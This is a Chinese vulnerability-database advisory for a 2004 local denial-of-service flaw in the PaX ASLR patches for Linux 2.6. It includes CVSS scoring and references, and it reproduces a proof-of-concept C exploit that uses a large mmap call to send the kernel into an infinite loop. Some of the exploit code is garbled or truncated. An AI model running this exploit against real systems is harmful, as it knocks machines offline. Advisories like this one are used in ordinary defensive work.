发布时间 :2004-05-02 00:00:00
修订时间 :2017-07-10 21:31:31

[原文]The arch_get_unmapped_area function in mmap.c in the PaX patches for Linux kernel 2.6, when Address Space Layout Randomization (ASLR) is enabled, allows local users to cause a denial of service (infinite loop) via unknown attack vectors.

[CNNVD]PaX 2.6内核补丁拒绝服务漏洞(CNNVD-200405-004)

        PaX是用于Linux Kernel的入侵防止补丁。
        Linux kernel在启用PaX Address Space Layout Randomization Layout模块时存在问题,可导致本地拒绝服务攻击。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:gentoo:linux:1.4Gentoo Linux 1.4

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  BUGTRAQ  20040502 PaX Linux Kernel 2.6 Patches DoS Advisory
(UNKNOWN)  BUGTRAQ  20040509 PaX DoS proof-of-concept
(UNKNOWN)  XF  pax-aslr-enabled-dos(16037)

- 漏洞信息

PaX 2.6内核补丁拒绝服务漏洞
低危 其他
2004-05-02 00:00:00 2005-10-20 00:00:00
        PaX是用于Linux Kernel的入侵防止补丁。
        Linux kernel在启用PaX Address Space Layout Randomization Layout模块时存在问题,可导致本地拒绝服务攻击。

- 公告与补丁

        The PaX Team
        The PaX Team PaX linux 2.6.5 :
        The PaX Team Patch pax-linux-2.6.5-200405011700.patch

- 漏洞信息 (24078)

PaX 2.6 Kernel Patch Denial Of Service Vulnerability (EDBID:24078)
linux local
2004-05-03 Verified
0 Shadowinteger
N/A [点击下载]

PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled. 

The vulnerability may be exploited by a local attacker to influence the kernel into an infinite loop.

  PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept
  by Shadowinteger <>

  Written after reading the security advisory posted by borg (ChrisR-) on
  Bugtraq 2004-05-03 (my time). ChrisR ->

  Acknowledgments: sabu (

    PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area()
    (function in mm/mmap.c) is vulnerable to a local Denial of Service attack
    because of a bug that puts the kernel into an infinite loop.

    Read the security advisory for more info:

    We need to get passed the following line of code in
    arch_get_unmapped_area() to succeed with a DoS:
        if (TASK_SIZE - len < addr) { ...

    We do it like this:


    DOSVAL is the value we'll use.

    arch_get_unmapped_area() does the following:

    if TASK_SIZE-DOSVAL < TYPICAL_ADDR then... run right into the vuln code.
    (TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed.

    A DOSVAL of e.g. 0x80000000 or above will work most times, no real need
    for the funky calculation above.

    There are quite a few functions available that are "front-ends" to
    arch_get_unmapped_area(). This exploit uses good-old mmap().

  Tiny DoS PoC:

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
int main(void){int fd=open("/dev/zero",O_RDONLY);mmap(0,0xa0000000,PROT_READ,MAP_PRIVATE,fd,0);}


#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdio.h>

#define TASK_SIZE 0xc0000000
#define TYPICAL_ADDR 0x43882000
#define SINK 0x04000000


int main() {
    int fd = open("/dev/zero", O_RDONLY);

    printf("PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n"
           "by Shadowinteger <> 20040504\n"
           "created after a sec advisory on bugtraq posted by borg (ChrisR-) 20040503\n"
           "ChrisR ->\n"
           "the exploit binary must be marked PF_PAX_RANDMMAP to work!\n"
           "greetz goes to: sabu (\n"
           "will exec \"mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\"\n"
           "if you run Linux 2.6.x-PaX or -grsec, this may \"hurt\" your CPU(s) a little,\n"
           "are you sure you want to continue? [type Y to continue] ", DOSVAL);

    if (getchar() != 'Y') {
        return 0;

           "attempting to DoS...\n");

    if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) {

    printf("your kernel does not seem to be vulnerable! :)\n");

    return 0;

- 漏洞信息

PaX ASLR mmap.c arch_get_unmapped_area Function Local DoS
Local Access Required Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

PaX contains a flaw that may allow a local denial of service. The issue is triggered when Address Space Layout Randomization is enabled, allowing attackers to potentially cause the kernel to enter an infinite loop. The vulnerability is reported to reside in linux/mm/mmap.c. The end result in loss of availability for the platform.

- 时间线

2004-05-04 Unknow
2004-05-09 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, the PaX team has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者